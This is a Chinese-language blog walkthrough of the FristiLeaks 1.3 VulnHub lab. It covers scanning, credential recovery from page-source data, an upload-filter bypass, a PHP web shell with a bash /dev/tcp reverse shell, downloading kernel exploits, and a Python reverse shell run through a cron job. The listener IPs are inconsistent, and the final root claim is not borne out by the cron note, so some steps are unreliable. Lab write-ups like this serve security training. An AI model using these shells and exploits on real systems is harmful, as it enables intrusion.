靶机地址:
https://www.vulnhub.com/entry/fristileaks-13,133/
一、主机发现+信息收集
主机发现
arp-scan -l
靶机ip:192.168.25.226
export ip=192.168.25.226
端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 80/tcp open http
只有80这一个端口在开放
服务信息扫描
nmap -sS -sV -O -p80 $ip
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3) MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|storage-misc|media device|webcam Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%) OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2 Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
默认脚本扫描
nmap --script=vuln -p80 $ip
80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-trace: TRACE is enabled |_http-dombased-xss: Couldn't find any DOM based XSS. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /robots.txt: Robots file | /icons/: Potentially interesting folder w/ directory listing |_ /images/: Potentially interesting folder w/ directory listing MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
二、开始渗透测试
访问web服务
静态页面但是下面的话是有一些信息的。
目录爆破
gobuster dir -u http://192.168.25.226/ -w /usr/share/dirbuster/wordlists/medium.txt
/images (Status: 301) [Size: 237] [--> http://192.168.25.226/images/] /beer (Status: 301) [Size: 235] [--> http://192.168.25.226/beer/] /cola (Status: 301) [Size: 235] [--> http://192.168.25.226/cola/]
指纹识别
whatweb http://192.168.25.226
http://192.168.25.226 [200 OK] Apache[2.2.15], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3], IP[192.168.25.226], PHP[5.3.3], WebDAV[2]
三张一模一样的图片
不是这个URL,那应该就是要让我们去找一个正确的URL
暴力寻找
cewl http://192.168.25.226 -w url.txt
我们这里直接使用cewl工具,这个工具会爬爬取网站单词并且组成字典
然后我们直接拿着这个字典到gobuster去扫描
这里我们直接找到了登录页面
我们刚刚的信息
sisi
cola
beer
@meneer, @barrebas, @rikvduijn, @wez3forsec, @PyroBatNL, @0xDUDE, @annejanbrouwer, @Sander2121, Reinierk, @DearCharles, @miamat, MisterXE, BasB, Dwight, Egeltje, @pdersjant, @tcp130x10, @spierenburg, @ielmatani, @renepieters, Mystery guest, @EQ_uinix, @WhatSecurity, @mramsmeets, @Ar0xA
可以构造字典进行弱口令爆破
查看源码我们可以得到一些密文信息
We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg==
看着像是base64我们直接拿着去破解
格式不对,我们看第一行可以知道这是一个png文件我们将其改为png
mv base64.txt base64.png
我们会得到这样一图片
keKkeKKeKKeKkEkkEk
再加上前面的用户名eezeepz
我们可以尝试一下,登录成功 
正常上传被拦了,查看指纹可以看到是个低版本的Apache,我们这样用多文件名绕过一下
成功上传,然后我们再到目录下查看
http://192.168.25.226/fristi/uploads/phpinfo.php.png
我们直接上传php马反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>
记得在Kali中开启监听,然后我们上传并访问
http://192.168.25.226/fristi/uploads/php%E5%8F%8D%E5%BC%B9.php.png
三、获取初级权限
四、提权
id
uname -a
Linux 2.6.32
内核版本比较低,我们直接找EXp提权
searchsploit -t Linux 2.6.32 | grep Privile
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
我们用CentOS这个EXP进行提权
searchsploit -m 25444
python -m http.server 800
在攻击机上开启监听然后到shell中使用wget 将EXP下载下来
cd /tmp 目录中其他目录没有权限
wget 192.168.25.132:800/25444.c 下载命令
head -n 20 25444.c 查看使用说明
gcc -O2 25444.c && ./a.out 参数无效提权失败
我们换一个EXP
searchsploit -m 9844
wget 192.168.25.132:800/9844.py
python 9844.py 执行
执行失败
那继续信息收集
cd /home/eezeepz
ls -liah
cat notes.txt
Yo EZ, I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/ Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. - Jerry
这里给了提示做了计划任务
这里我们写上一个文件然后让它执行反弹shell命令
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.30.182",8421));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
开启服务器wget下载
wget http://192.168.25.132/rc.py
echo '/usr/bin/python /tmp/rc.py' > runthis
成功提权为Root
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/fristileaks_1-3%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论